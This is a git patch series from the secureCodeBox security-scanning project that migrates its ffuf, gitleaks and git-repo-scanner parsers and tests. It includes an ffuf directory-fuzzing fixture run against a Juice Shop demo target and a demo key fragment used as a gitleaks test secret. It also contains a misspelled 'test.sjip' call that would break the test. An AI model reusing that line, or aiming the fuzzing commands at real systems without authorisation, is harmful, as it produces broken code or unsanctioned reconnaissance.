scanners/ffuf/parser/__testFiles__/juice-shop.json.license diff --git a/scanners/ffuf/Taskfile.yaml b/scanners/ffuf/Taskfile.yaml new file mode 100644 index 0000000000..1f6917ee8b --- /dev/null +++ b/scanners/ffuf/Taskfile.yaml @@ -0,0 +1,17 @@ +version: "3" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + excludes: + - predeploy + vars: + scannerName: ffuf + +tasks: + predeploy: + deps: + - demo-targets:deploy:juice-shop + cmds: + - kubectl apply -f ./integration-tests/configmap-wordlist.yaml -n integration-tests diff --git a/scanners/ffuf/integration-tests/ffuf.test.js b/scanners/ffuf/integration-tests/ffuf.test.js index 2d6a3ff6ab..848c8d8567 100644 --- a/scanners/ffuf/integration-tests/ffuf.test.js +++ b/scanners/ffuf/integration-tests/ffuf.test.js @@ -5,14 +5,14 @@ import { scan } from "../../../tests/integration/helpers.js"; test( - "FFuf scan with config YAML against 'juiceshop'", + "FFuf scan with config YAML against 'juice-shop'", async () => { const { categories, severities, count } = await scan( - "ffuf-scan-juiceshop-demo", + "ffuf-scan-juice-shop-demo", "ffuf", [ "-u", - "http://juiceshop.demo-targets.svc:3000/FUZZ", + "http://juice-shop.demo-targets.svc:3000/FUZZ", "-w", "/config/wordlist.txt", ], diff --git a/scanners/ffuf/parser/__testFiles__/juice-shop.json b/scanners/ffuf/parser/__testFiles__/juice-shop.json new file mode 100644 index 0000000000..1ddf81c0bc --- /dev/null +++ b/scanners/ffuf/parser/__testFiles__/juice-shop.json @@ -0,0 +1,126 @@ +{ + "commandline": "ffuf -o /home/securecodebox/ffuf-results.json -u http://juice-shop.demo-targets.svc:3000/FUZZ -w /config/wordlist.txt", + "time": "2025-07-02T08:55:43Z", + "results": [ + { + "input": { + "FFUFHASH": "1", + "FUZZ": "metrics" + }, + "position": 1, + "status": 200, + "length": 22968, + "words": 901, + "lines": 346, + "content-type": "text/plain; version=0.0.4; charset=utf-8", + "redirectlocation": "", + "scraper": {}, + "duration": 2797417, + "resultfile": "", + "url": "http://juice-shop.demo-targets.svc:3000/metrics", + "host": "juice-shop.demo-targets.svc:3000" + }, + { + "input": { + "FFUFHASH": "2", + "FUZZ": "ftp" + }, + "position": 2, + "status": 200, + "length": 11070, + "words": 1568, + "lines": 357, + "content-type": "text/html; charset=utf-8", + "redirectlocation": "", + "scraper": {}, + "duration": 5022084, + "resultfile": "", + "url": "http://juice-shop.demo-targets.svc:3000/ftp", + "host": "juice-shop.demo-targets.svc:3000" + } + ], + "config": { + "autocalibration": false, + "autocalibration_keyword": "FUZZ", + "autocalibration_perhost": false, + "autocalibration_strategies": [ + "basic" + ], + "autocalibration_strings": [], + "colors": false, + "cmdline": "ffuf -o /home/securecodebox/ffuf-results.json -u http://juice-shop.demo-targets.svc:3000/FUZZ -w /config/wordlist.txt", + "configfile": "", + "postdata": "", + "debuglog": "", + "delay": { + "value": "0.00" + }, + "dirsearch_compatibility": false, + "encoders": [], + "extensions": [], + "fmode": "or", + "follow_redirects": false, + "headers": {}, + "ignorebody": false, + "ignore_wordlist_comments": false, + "inputmode": "clusterbomb", + "cmd_inputnum": 100, + "inputproviders": [ + { + "name": "wordlist", + "keyword": "FUZZ", + "value": "/config/wordlist.txt", + "encoders": "", + "template": "" + } + ], + "inputshell": "", + "json": false, + "matchers": { + "IsCalibrated": false, + "Mutex": {}, + "Matchers": { + "status": { + "value": "200-299,301,302,307,401,403,405,500" + } + }, + "Filters": {}, + "PerDomainFilters": {} + }, + "mmode": "or", + "maxtime": 0, + "maxtime_job": 0, + "method": "GET", + "noninteractive": false, + "outputdirectory": "", + "outputfile": "/home/securecodebox/ffuf-results.json", + "outputformat": "json", + "OutputSkipEmptyFile": false, + "proxyurl": "", + "quiet": false, + "rate": 0, + "raw": false, + "recursion": false, + "recursion_depth": 0, + "recursion_strategy": "default", + "replayproxyurl": "", + "requestfile": "", + "requestproto": "https", + "scraperfile": "", + "scrapers": "all", + "sni": "", + "stop_403": false, + "stop_all": false, + "stop_errors": false, + "threads": 40, + "timeout": 10, + "url": "http://juice-shop.demo-targets.svc:3000/FUZZ", + "verbose": false, + "wordlists": [ + "/config/wordlist.txt" + ], + "http2": false, + "client-cert": "", + "client-key": "" + } +} \ No newline at end of file diff --git a/scanners/ffuf/parser/__testFiles__/juice-shop.json.license b/scanners/ffuf/parser/__testFiles__/juice-shop.json.license new file mode 100644 index 0000000000..3034c0d74b --- /dev/null +++ b/scanners/ffuf/parser/__testFiles__/juice-shop.json.license @@ -0,0 +1,3 @@ +SPDX-FileCopyrightText: the secureCodeBox authors + +SPDX-License-Identifier: Apache-2.0 \ No newline at end of file diff --git a/scanners/ffuf/parser/parser.js b/scanners/ffuf/parser/parser.js index 19d96f7b6a..1a1de9a8de 100644 --- a/scanners/ffuf/parser/parser.js +++ b/scanners/ffuf/parser/parser.js @@ -3,37 +3,41 @@ // SPDX-License-Identifier: Apache-2.0 export async function parse(fileContent) { - if (!fileContent || !fileContent.results || fileContent.results.length == 0) { + if (!fileContent) { return []; } - return fileContent.results.map((result) => { - const time = new Date(fileContent.time).toISOString(); - return { - name: "Webserver Content", - description: `Content [${result.input ? Object.values(result.input) : ""}] was found on the webserver ${result.host}.`, // todo rn: what if no FUZZ keyword is used?? - identified_at: time, - osi_layer: "APPLICATION", - severity: "INFORMATIONAL", - category: "Webserver Content", - attributes: { - httpStatus: result.status, - length: result.length, - words: result.words, - lines: result.lines, - contentType: result["content-type"], - redirectlocation: result.redirectlocation, - duration: result.duration, - // resultFile = the name of the file containing the full request and response, - // SCB does currently not implement saving the file (because data might be large) - // resultFile: result.resultfile, - hostname: result.host, - input: result.input, - // FUZZ keywords can also be in headers -> we should see that within the result - postdata: fileContent?.config?.postdata, - // FUZZ keywords can also be in headers -> we should see that within the result - headers: fileContent?.config?.headers, - }, - location: result.url, - }; - }); + + const report = JSON.parse(fileContent); + if (!report.results || report.results.length == 0) { + return []; + } + + const time = new Date(report.time).toISOString(); + return report.results.map((result) => ({ + name: "Webserver Content", + description: `Content [${result.input ? Object.values(result.input) : ""}] was found on the webserver ${result.host}.`, // todo rn: what if no FUZZ keyword is used?? + identified_at: time, + osi_layer: "APPLICATION", + severity: "INFORMATIONAL", + category: "Webserver Content", + attributes: { + httpStatus: result.status, + length: result.length, + words: result.words, + lines: result.lines, + contentType: result["content-type"], + redirectlocation: result.redirectlocation, + duration: result.duration, + // resultFile = the name of the file containing the full request and response, + // SCB does currently not implement saving the file (because data might be large) + // resultFile: result.resultfile, + hostname: result.host, + input: result.input, + // FUZZ keywords can also be in headers -> we should see that within the result + postdata: report?.config?.postdata, + // FUZZ keywords can also be in headers -> we should see that within the result + headers: report?.config?.headers, + }, + location: result.url, + })); } diff --git a/scanners/ffuf/parser/parser.test.js b/scanners/ffuf/parser/parser.test.js index 2e764c10fa..a00a0eb604 100644 --- a/scanners/ffuf/parser/parser.test.js +++ b/scanners/ffuf/parser/parser.test.js @@ -8,10 +8,11 @@ import { validateParser } from "@securecodebox/parser-sdk-nodejs/parser-utils"; import { parse } from "./parser"; test("should properly parse ffuf json file", async () => { - const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/ffuf-results.json", { + const fileContent = await readFile( + __dirname + "/__testFiles__/ffuf-results.json", + { encoding: "utf8", - }), + }, ); const findings = await parse(fileContent); // validate findings @@ -71,14 +72,13 @@ test("should properly parse ffuf json file", async () => { }); test("should properly parse ffuf json file wih multiple fuzz keyword inputs", async () => { - const fileContent = JSON.parse( - await readFile( - __dirname + "/__testFiles__/ffuf-results-multiple-fuzz-keywords.json", - { - encoding: "utf8", - }, - ), + const fileContent = await readFile( + __dirname + "/__testFiles__/ffuf-results-multiple-fuzz-keywords.json", + { + encoding: "utf8", + }, ); + const findings = await parse(fileContent); // validate findings await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -114,10 +114,11 @@ test("should properly parse ffuf json file wih multiple fuzz keyword inputs", as }); test("should properly parse ffuf json file with postdata", async () => { - const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/ffuf-results-postdata.json", { + const fileContent = await readFile( + __dirname + "/__testFiles__/ffuf-results-postdata.json", + { encoding: "utf8", - }), + }, ); const findings = await parse(fileContent); // validate findings @@ -156,22 +157,87 @@ test("should properly parse ffuf json file with postdata", async () => { }); test("should properly parse empty json file", async () => { - const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/empty.json", { + const fileContent = await readFile(__dirname + "/__testFiles__/empty.json", { + encoding: "utf8", + }); + const findings = await parse(fileContent); + // validate findings + await expect(validateParser(findings)).resolves.toBeUndefined(); + expect(findings).toMatchInlineSnapshot(`[]`); +}); + +test("should properly parse juice-shop findings json file", async () => { + const fileContent = await readFile( + __dirname + "/__testFiles__/juice-shop.json", + { encoding: "utf8", - }), + }, ); const findings = await parse(fileContent); // validate findings await expect(validateParser(findings)).resolves.toBeUndefined(); - expect(findings).toMatchInlineSnapshot(`[]`); + expect(findings).toMatchInlineSnapshot(` + [ + { + "attributes": { + "contentType": "text/plain; version=0.0.4; charset=utf-8", + "duration": 2797417, + "headers": {}, + "hostname": "juice-shop.demo-targets.svc:3000", + "httpStatus": 200, + "input": { + "FFUFHASH": "1", + "FUZZ": "metrics", + }, + "length": 22968, + "lines": 346, + "postdata": "", + "redirectlocation": "", + "words": 901, + }, + "category": "Webserver Content", + "description": "Content [1,metrics] was found on the webserver juice-shop.demo-targets.svc:3000.", + "identified_at": "2025-07-02T08:55:43.000Z", + "location": "http://juice-shop.demo-targets.svc:3000/metrics", + "name": "Webserver Content", + "osi_layer": "APPLICATION", + "severity": "INFORMATIONAL", + }, + { + "attributes": { + "contentType": "text/html; charset=utf-8", + "duration": 5022084, + "headers": {}, + "hostname": "juice-shop.demo-targets.svc:3000", + "httpStatus": 200, + "input": { + "FFUFHASH": "2", + "FUZZ": "ftp", + }, + "length": 11070, + "lines": 357, + "postdata": "", + "redirectlocation": "", + "words": 1568, + }, + "category": "Webserver Content", + "description": "Content [2,ftp] was found on the webserver juice-shop.demo-targets.svc:3000.", + "identified_at": "2025-07-02T08:55:43.000Z", + "location": "http://juice-shop.demo-targets.svc:3000/ftp", + "name": "Webserver Content", + "osi_layer": "APPLICATION", + "severity": "INFORMATIONAL", + }, + ] + `); }); test("should properly parse zero findings json file", async () => { - const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/zeroFindings.json", { + const fileContent = await readFile( + __dirname + "/__testFiles__/zeroFindings.json", + { encoding: "utf8", - }), + }, ); const findings = await parse(fileContent); // validate findings From ce9c97ae25c29287a5b5e6ed369c33250ec5be65 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 2 Jul 2025 11:14:39 +0200 Subject: [PATCH 059/137] Migrate gitleaks --- scanners/gitleaks/Taskfile.yaml | 10 +++ .../integration-tests/gitleaks.test.js | 9 ++- scanners/gitleaks/parser/parser.js | 77 ++++++++++--------- scanners/gitleaks/parser/parser.test.js | 12 +-- 4 files changed, 60 insertions(+), 48 deletions(-) create mode 100644 scanners/gitleaks/Taskfile.yaml diff --git a/scanners/gitleaks/Taskfile.yaml b/scanners/gitleaks/Taskfile.yaml new file mode 100644 index 0000000000..f54b9ba475 --- /dev/null +++ b/scanners/gitleaks/Taskfile.yaml @@ -0,0 +1,10 @@ +version: "3" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + vars: + scannerName: gitleaks + +tasks: {} diff --git a/scanners/gitleaks/integration-tests/gitleaks.test.js b/scanners/gitleaks/integration-tests/gitleaks.test.js index bcb46b1f4e..d99fb4ec36 100644 --- a/scanners/gitleaks/integration-tests/gitleaks.test.js +++ b/scanners/gitleaks/integration-tests/gitleaks.test.js @@ -2,9 +2,8 @@ // // SPDX-License-Identifier: Apache-2.0 -const { scan } = require("../../../tests/integration/helpers.js"); - -jest.retryTimes(0); +import { time } from "console"; +import { scan } from "../../../tests/integration/helpers.js"; test( "Gitleaks should find one secret in a demo target", @@ -69,5 +68,7 @@ vOLRZhe7xrVYy3d0FUmGAAAAFnlvdXJfZW1haWxAZXhhbXBsZS5jb20BAgMEBQYH medium: 1, }); }, - 3 * 60 * 1000, + { + timeout: 3 * 60 * 1000, + }, ); diff --git a/scanners/gitleaks/parser/parser.js b/scanners/gitleaks/parser/parser.js index 2ef05c99fa..cef4850854 100644 --- a/scanners/gitleaks/parser/parser.js +++ b/scanners/gitleaks/parser/parser.js @@ -2,48 +2,51 @@ // // SPDX-License-Identifier: Apache-2.0 -const HIGH_TAGS = ["HIGH"]; -const LOW_TAGS = ["LOW"]; - const repoUrlAnnotationKey = "metadata.scan.securecodebox.io/git-repo-url"; -async function parse(fileContent, scan) { - if (fileContent) { - const commitUrlBase = prepareCommitUrl(scan); - - return fileContent.map((finding) => { - let severity = "MEDIUM"; +export async function parse(fileContent, scan) { + if (!fileContent) { + return []; + } - if (containsTag(finding.Tags, HIGH_TAGS)) { - severity = "HIGH"; - } else if (containsTag(finding.Tags, LOW_TAGS)) { - severity = "LOW"; - } + const report = JSON.parse(fileContent); - return { - name: finding.RuleID, - description: - "The name of the rule which triggered the finding: " + finding.RuleID, - osi_layer: "APPLICATION", - severity: severity, - category: "Potential Secret", - attributes: { - commit: commitUrlBase + finding.Commit, - description: finding.Description, - offender: finding.Secret, - author: finding.Author, - email: finding.Email, - date: finding.Date, - file: finding.File, - line_number: finding.StartLine, - tags: finding.Tags, - line: finding.Match, - }, - }; - }); - } else { + if (!report) { return []; } + + const commitUrlBase = prepareCommitUrl(scan); + + return report.map((finding) => { + let severity = "MEDIUM"; + + if (containsTag(finding.Tags, ["HIGH"])) { + severity = "HIGH"; + } else if (containsTag(finding.Tags, ["LOW"])) { + severity = "LOW"; + } + + return { + name: finding.RuleID, + description: + "The name of the rule which triggered the finding: " + finding.RuleID, + osi_layer: "APPLICATION", + severity: severity, + category: "Potential Secret", + attributes: { + commit: commitUrlBase + finding.Commit, + description: finding.Description, + offender: finding.Secret, + author: finding.Author, + email: finding.Email, + date: finding.Date, + file: finding.File, + line_number: finding.StartLine, + tags: finding.Tags, + line: finding.Match, + }, + }; + }); } function containsTag(tag, tags) { @@ -66,5 +69,3 @@ function prepareCommitUrl(scan) { ? repositoryUrl + "commit/" : repositoryUrl + "/commit/"; } - -module.exports.parse = parse; diff --git a/scanners/gitleaks/parser/parser.test.js b/scanners/gitleaks/parser/parser.test.js index d05b942aa1..2c89506b62 100644 --- a/scanners/gitleaks/parser/parser.test.js +++ b/scanners/gitleaks/parser/parser.test.js @@ -16,7 +16,7 @@ test("should properly parse empty gitleaks json file", async () => { encoding: "utf8", }, ); - const findings = await parse(JSON.parse(jsonContent)); + const findings = await parse(jsonContent); await expect(validateParser(findings)).resolves.toBeUndefined(); expect(findings).toMatchObject([]); }); @@ -28,7 +28,7 @@ test("should properly parse gitleaks json file with null result", async () => { encoding: "utf8", }, ); - const findings = await parse(JSON.parse(jsonContent)); + const findings = await parse(jsonContent); await expect(validateParser(findings)).resolves.toBeUndefined(); expect(findings).toMatchObject([]); }); @@ -40,7 +40,7 @@ test("should properly parse gitleaks json file", async () => { encoding: "utf8", }, ); - const findings = await parse(JSON.parse(jsonContent)); + const findings = await parse(jsonContent); await expect(validateParser(findings)).resolves.toBeUndefined(); expect(findings).toMatchInlineSnapshot(` [ @@ -133,7 +133,7 @@ test("should define severity based on tags in result file", async () => { encoding: "utf8", }, ); - const findings = await parse(JSON.parse(jsonContent)); + const findings = await parse(jsonContent); await expect(validateParser(findings)).resolves.toBeUndefined(); expect(findings).toMatchInlineSnapshot(` @@ -223,7 +223,7 @@ test("should properly construct commit URL if given in scan annotation without t encoding: "utf8", }, ); - const findings = await parse(JSON.parse(jsonContent), scan); + const findings = await parse(jsonContent, scan); await expect(validateParser(findings)).resolves.toBeUndefined(); expect(findings).toMatchInlineSnapshot(` @@ -330,7 +330,7 @@ test("should properly construct commit URL if given in scan annotation with trai encoding: "utf8", }, ); - const findings = await parse(JSON.parse(jsonContent), scan); + const findings = await parse(jsonContent, scan); await expect(validateParser(findings)).resolves.toBeUndefined(); expect(findings).toMatchInlineSnapshot(` From a4711762d0271c0dbea1abca703e9929f57ee5ee Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 2 Jul 2025 11:21:55 +0200 Subject: [PATCH 060/137] Properly migrate git-repo-scanner --- scanners/git-repo-scanner/Taskfile.yaml | 10 ++ scanners/git-repo-scanner/parser/parser.js | 2 +- .../git-repo-scanner/parser/parser.test.js | 124 +++++++++--------- 3 files changed, 73 insertions(+), 63 deletions(-) create mode 100644 scanners/git-repo-scanner/Taskfile.yaml diff --git a/scanners/git-repo-scanner/Taskfile.yaml b/scanners/git-repo-scanner/Taskfile.yaml new file mode 100644 index 0000000000..f220ae374a --- /dev/null +++ b/scanners/git-repo-scanner/Taskfile.yaml @@ -0,0 +1,10 @@ +version: "3" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + vars: + scannerName: git-repo-scanner + +tasks: {} diff --git a/scanners/git-repo-scanner/parser/parser.js b/scanners/git-repo-scanner/parser/parser.js index 790b4dc96f..c65ade4372 100644 --- a/scanners/git-repo-scanner/parser/parser.js +++ b/scanners/git-repo-scanner/parser/parser.js @@ -3,5 +3,5 @@ // SPDX-License-Identifier: Apache-2.0 export async function parse(fileContent) { - return fileContent; + return JSON.parse(fileContent) || []; } diff --git a/scanners/git-repo-scanner/parser/parser.test.js b/scanners/git-repo-scanner/parser/parser.test.js index a851d1e300..3180436f75 100644 --- a/scanners/git-repo-scanner/parser/parser.test.js +++ b/scanners/git-repo-scanner/parser/parser.test.js @@ -14,9 +14,9 @@ test("should properly parse empty json file", async () => { encoding: "utf8", }, ); - const findings = await parse(JSON.parse(fileContent)); + const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); - expect(findings).toMatchInlineSnapshot(`Array []`); + expect(findings).toMatchInlineSnapshot(`[]`); }); test("should properly parse git-scanner json file", async () => { @@ -26,12 +26,12 @@ test("should properly parse git-scanner json file", async () => { encoding: "utf8", }, ); - const findings = await parse(JSON.parse(fileContent)); + const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); expect(findings).toMatchInlineSnapshot(` - Array [ - Object { - "attributes": Object { + [ + { + "attributes": { "created_at": "2017-02-02T09:48:05Z", "full_name": "secureCodeBox/secureCodeBox", "id": 80711933, @@ -48,8 +48,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2018-03-01T10:50:05Z", "full_name": "secureCodeBox/engine", "id": 123422137, @@ -66,8 +66,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2018-03-08T14:20:36Z", "full_name": "secureCodeBox/scanner-infrastructure-nmap", "id": 124402117, @@ -84,8 +84,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2018-03-20T15:48:39Z", "full_name": "secureCodeBox/nodejs-scanner-scaffolding", "id": 126042943, @@ -102,8 +102,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2018-04-06T13:13:14Z", "full_name": "secureCodeBox/scanner-webserver-nikto", "id": 128396681, @@ -120,8 +120,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2018-04-10T11:17:29Z", "full_name": "secureCodeBox/scanner-webapplication-zap", "id": 128920739, @@ -138,8 +138,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2018-05-15T11:43:11Z", "full_name": "secureCodeBox/scanner-infrastructure-sslyze", "id": 133507929, @@ -156,8 +156,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2018-05-24T06:47:00Z", "full_name": "secureCodeBox/scanner-webapplication-arachni", "id": 134673181, @@ -174,8 +174,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2018-07-18T16:38:18Z", "full_name": "secureCodeBox/scanner-infrastructure-amass", "id": 141462466, @@ -192,8 +192,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2018-07-30T12:13:41Z", "full_name": "secureCodeBox/integration-pipeline-jenkins-examples", "id": 142870794, @@ -210,8 +210,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2018-08-16T08:11:15Z", "full_name": "secureCodeBox/ansible-role-securecodebox-openshift", "id": 144957631, @@ -228,8 +228,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2018-12-12T15:21:02Z", "full_name": "secureCodeBox/django-DefectDojo", "id": 161506648, @@ -246,8 +246,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2019-02-18T14:23:57Z", "full_name": "secureCodeBox/scanner-infrastructure-ssh", "id": 171298120, @@ -264,8 +264,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2019-04-10T09:03:38Z", "full_name": "secureCodeBox/scanner-cms-wpscan", "id": 180543766, @@ -282,8 +282,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2019-04-10T11:39:04Z", "full_name": "secureCodeBox/ruby-scanner-scaffolding", "id": 180568880, @@ -300,8 +300,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2019-08-21T13:21:09Z", "full_name": "secureCodeBox/securecodebox.github.io", "id": 203588805, @@ -318,8 +318,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2019-08-26T14:11:02Z", "full_name": "secureCodeBox/gatsby-gh-pages-action", "id": 204489733, @@ -336,8 +336,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2019-08-27T12:46:48Z", "full_name": "secureCodeBox/ssh_scan", "id": 204701677, @@ -354,8 +354,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2019-10-11T11:28:15Z", "full_name": "secureCodeBox/swagger-petstore-openshift", "id": 214418800, @@ -372,8 +372,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2019-11-19T11:25:21Z", "full_name": "secureCodeBox/nikto", "id": 222679857, @@ -390,8 +390,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2019-11-25T13:34:16Z", "full_name": "secureCodeBox/scanner-infrastructure-ncrack", "id": 223956455, @@ -408,8 +408,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2020-03-24T14:33:08Z", "full_name": "secureCodeBox/secureCodeBox-v2", "id": 249731346, @@ -426,8 +426,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2020-03-29T10:40:12Z", "full_name": "secureCodeBox/zap-extensions", "id": 251007807, @@ -444,8 +444,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2020-07-07T14:14:16Z", "full_name": "secureCodeBox/zaproxy", "id": 277835641, @@ -462,8 +462,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2020-08-07T17:58:52Z", "full_name": "secureCodeBox/static-export", "id": 285890805, @@ -480,8 +480,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2020-08-17T15:09:19Z", "full_name": "secureCodeBox/telemetry", "id": 288212154, @@ -498,8 +498,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2020-09-02T13:39:10Z", "full_name": "secureCodeBox/documentation", "id": 292293538, @@ -516,8 +516,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2020-09-03T13:08:22Z", "full_name": "secureCodeBox/ui", "id": 292573194, @@ -534,8 +534,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2020-09-28T08:58:53Z", "full_name": "secureCodeBox/internal", "id": 299249650, From 44b951dbda401f8728b60748e51949bb53f3138d Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 2 Jul 2025 11:22:04 +0200 Subject: [PATCH 061/137] Fix python warning --- .../git-repo-scanner/scanner/git_repo_scanner/__main__.py | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/scanners/git-repo-scanner/scanner/git_repo_scanner/__main__.py b/scanners/git-repo-scanner/scanner/git_repo_scanner/__main__.py index c7a8f59ff9..093c0acf97 100644 --- a/scanners/git-repo-scanner/scanner/git_repo_scanner/__main__.py +++ b/scanners/git-repo-scanner/scanner/git_repo_scanner/__main__.py @@ -6,10 +6,7 @@ import json import logging import sys -from datetime import datetime - -# https://docs.python.org/3/library/datetime.html -from datetime import timedelta +from datetime import datetime, timedelta, timezone from pathlib import Path import github @@ -27,7 +24,7 @@ logging.basicConfig(level=logging.INFO, format=log_format) logger = logging.getLogger("git_repo_scanner") -now_utc = pytz.utc.localize(datetime.utcnow()) +now_utc = datetime.now(timezone.utc) def main(): From ee92ba3c9c3b84081bf3f3409aa500cc612695b6 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 2 Jul 2025 11:22:14 +0200 Subject: [PATCH 062/137] Enable ci for gitleaks --- .github/workflows/ci.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index 7ab2f5c856..a47e840f97 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -422,7 +422,7 @@ jobs: - cmseek - ffuf - git-repo-scanner - # - gitleaks + - gitleaks # - kube-hunter # - ncrack # - nikto From a9cef9612c5f6a329ca6db70da3210f66e973ac7 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 2 Jul 2025 14:53:55 +0200 Subject: [PATCH 063/137] Disabled (as before) to rate limiting issues for unauthenticated requests --- .../integration-tests/git-repo-scanner.test.js | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/scanners/git-repo-scanner/integration-tests/git-repo-scanner.test.js b/scanners/git-repo-scanner/integration-tests/git-repo-scanner.test.js index e7c6a18791..5837913e99 100644 --- a/scanners/git-repo-scanner/integration-tests/git-repo-scanner.test.js +++ b/scanners/git-repo-scanner/integration-tests/git-repo-scanner.test.js @@ -4,8 +4,8 @@ import { scan } from "../../../tests/integration/helpers.js"; -test( - "gitleaks should find at least 1 repository in the GitHub secureCodeBox organisation", +test.sjip( + "git-repo-scanner should find at least 1 repository in the GitHub secureCodeBox organisation", async () => { // This integration tests runs about 30min because of the GitHub Public API call rate limit. // If you want to speed up you need to add an valid access token like: ['--git-type', 'github', '--organization', 'secureCodeBox', '--access-token', '23476VALID2345TOKEN'], From 2de9f00c3d35c9386deded63583d3fe7c4cc34cc Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 2 Jul 2025 14:55:42 +0200 Subject: [PATCH 064/137] Correct cmseek test to cause it to actually start a scan with invalid args Was previously rejected due to naming violation of the scan name --- scanners/cmseek/integration-tests/cmseek.test.js | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/scanners/cmseek/integration-tests/cmseek.test.js b/scanners/cmseek/integration-tests/cmseek.test.js index d94f23161e..297ab187d6 100644 --- a/scanners/cmseek/integration-tests/cmseek.test.js +++ b/scanners/cmseek/integration-tests/cmseek.test.js @@ -64,8 +64,10 